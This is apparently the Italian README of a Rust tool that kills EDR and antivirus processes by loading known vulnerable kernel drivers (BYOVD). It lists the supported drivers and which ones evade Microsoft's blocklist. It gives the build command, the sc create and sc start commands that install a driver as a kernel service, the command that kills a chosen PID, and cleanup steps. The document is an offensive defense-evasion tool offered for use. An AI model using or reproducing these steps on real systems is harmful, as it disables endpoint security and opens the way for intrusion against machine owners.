
BYOVD collection
Questo progetto è una raccolta BYOVD incentrata sull'eliminazione dei processi EDR / AV.
Attualmente sono supportati i seguenti driver:
| Driver | Nome Argomento | Bloccato |
|---|---|---|
| Process Explorer | process_explorer | Sì |
| Genshin Impact | genshin | Sì |
| Rentdrv2 | rentdrv2 | No |
| TrueSight | truesight | No |
Bloccato significa che il driver è nella lista di blocco di Microsoft e non può essere eseguito su un Windows aggiornato.
cargo build --release
rusty_drivers.exe --help
Usage: rusty_drivers.exe --pid <PID> --driver <DRIVER>
Options:
-p, --pid <PID>
-d, --driver <DRIVER>
-h, --help Print help
-V, --version Print version
Poiché l'eseguibile non registra un servizio per sfruttare il driver, è necessario farlo manualmente:
sc create Test123 binpath= c:\test\<DRIVER>.sys type= kernel start= auto
Successivamente, il servizio può essere avviato:
sc start Test123
Infine, per terminare il processo con PID 1234 utilizzando il driver Process Explorer, è possibile usare il seguente comando:
rusty_drivers.exe --pid 1234 --driver process_explorer
Non dimenticare di rimuovere il servizio in seguito:
sc stop Test123
sc delete Test123